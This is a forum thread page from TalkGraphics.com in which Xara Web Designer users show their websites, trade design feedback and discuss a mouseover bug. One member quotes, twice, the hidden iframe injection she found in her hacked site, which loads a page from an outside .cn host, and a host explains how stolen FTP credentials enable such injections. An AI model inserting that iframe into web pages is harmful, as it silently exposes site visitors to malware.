Welcome to TalkGraphics.com
Page 65 of 78 FirstFirst ... 1555636465666775 ... LastLast

Default Re: Show us your sites!

Quote Originally Posted by LindyJo View Post
    Mr KFoster,

Just want to say that your site is wonderful.

I love the BLUE.. great choice and the other guys here commented that it is CLEAR from your site what you do! Great job.

Constructive assistance from my side would be the menu drop downs.. not clear enough.. they maybe should be a little bigger?? dump the outlines on the text there.. dunno - but they arent that CLEAR..

Otherwise great.. if you need to visualize a site for a client.. talk to me..
    or see www.renderit.cxxxxxxxxxxxxxxxxxxxxxxxxxxc .. soon to be upgraded to a Xara masterpiece.. but ok for now

oh.. btw.. what did you use to make your flash movie?

x Linz
    I'm afraid to say AVG is reporting the virus on the link to your new site now..

Paul
    IP

Hello fellow Xaraians. Have not posted before, usually just cruise around and read posts to get info. Have used Xara over 10 years and tell everyone I know about it, but just recently got Xara Web Designer.

Just recently launched my new site and hoped some of you might want to give feedback. Got a compliment from tech support when I had some problems, which were never resolved, so finally did a work around. My programming experience is minimal compared with the techies I usually work with (I primarily do design), but I was able to do this custom site, completely by myself, in a couple of weeks from start to finish.

Would welcome feedback and thanks for taking the time to take a peek.

StudioLXVI

Pixelart
    IP

Default Re: Red Barn warning Malicious code

Hey guys

I found it!

The *******s.. who are these peopLe? Havent they got something better to do?

<body style=""><iframe src="http://bigtopstats.cn:8080/index.php" width=146 height=111 style="visibility: hidden"></iframe>

was the code I found...

My permissions on files are now 444 so even I cant edit them..

Maybe that will fix it..

SO SO sorry to cause you any hassle...

Please note when looking for help on this issue I got lots of results saying "Hire a FreeLancer".. well I suppose you have to make a living - but thats an invasion of privacy???

While we are there.. SEARCH CODE option in Xara WD!! please! cause I had to use dreamweaver again ..ugggh
    IP

I just accessed your Red Barn site, LindyJo ... no problem this time!
    IP

Just looked at your site, Pixelart. Handsome work. The text is a bit small (for me) though. I noticed an interesting effect when dragging my cursor over the portfolio page's navigation. The mouseover effect doesn't properly turn off when the mouse leaves the button bounds. See below.
    Attached Thumbnails Attached Thumbnails Click image for larger version. 

Name:	_temp1.jpg 
Views:	302 
Size:	13.5 KB 
ID:	62424  
    IP

Thanks for taking a look. Yes, I know the issue with mouseover. The only thing I can think of is the close proximity of the links to each other, and could not find a fix for it. Tech support was nice, but took a bit to reply to another issue, and their suggested fix did not work; so didn't bother with this problem. Was hoping people didn't mouse too fast! If anyone knows if there is a way to fix it, would love to know.

Pixelart
    IP

Actually, I noticed later that the speed of the mouse movement was not all that important. It seems to behave erratically. Is each numeric button composed of two groups on two layers? Are you explicitly exporting the text on those buttons as text? If you'll attach your .web file to your next post, I'll be more than happy to examine the navigation elements construction for a possible fix.
    IP

Andover, Massachusetts, USA, Earth, Milky Way, Universe

What's funny is that it doesn't happen when I go left. Only going right.
    -h
    ===============
    (a.k.a.) Bobby Harris
    IP

Thank you Curtis. That is very nice of you and I have attached the .web file. Yes, the static and mouseover states are on separate layers. From what I understood, that was the way it needed to be.

My issue that I contacted Tech Support about was that the global website link properties were not working right for me (the visited state would not work), and after doing what they explained did not fix the problem, and then the color assignment for each state got all confused. Was really strange.

Thank you SO much for your offer to help.

Pixelart (aka: Jeanne)
    Attached Files Attached Files
    IP

Default Re: Red Barn warning Malicious code

Quote Originally Posted by LindyJo View Post
    Hey guys

I found it!

The *******s.. who are these peopLe? Havent they got something better to do?

<body style=""><iframe src="http://bigtopstats.cn:8080/index.php" width=146 height=111 style="visibility: hidden"></iframe>

was the code I found...

My permissions on files are now 444 so even I cant edit them..

Maybe that will fix it..

SO SO sorry to cause you any hassle...

Please note when looking for help on this issue I got lots of results saying "Hire a FreeLancer".. well I suppose you have to make a living - but thats an invasion of privacy???

While we are there.. SEARCH CODE option in Xara WD!! please! cause I had to use dreamweaver again ..ugggh
    Over 99% of the time, they get the ftp username/password, download the files, then upload the new modified ones. If they can ftp in, they'll be able to change the permissions also.

I've seen this quite a bit as I have 10 Linux servers and a hosting company and the problem has always been a keylogger on the clients computer that records the ftp username/password.

What you should do, is a complete virus scan of your computer with an up-to-date virus scanner and after correcting any problems you find, change the ftp password.

I've also found that blocking IP's to not be effective as they use either proxies or infected pc's to log in, often the IP used to download the files will be different when they upload the modified files a few minutes later.
    Chris
    LotsMoreHosting.com
    IP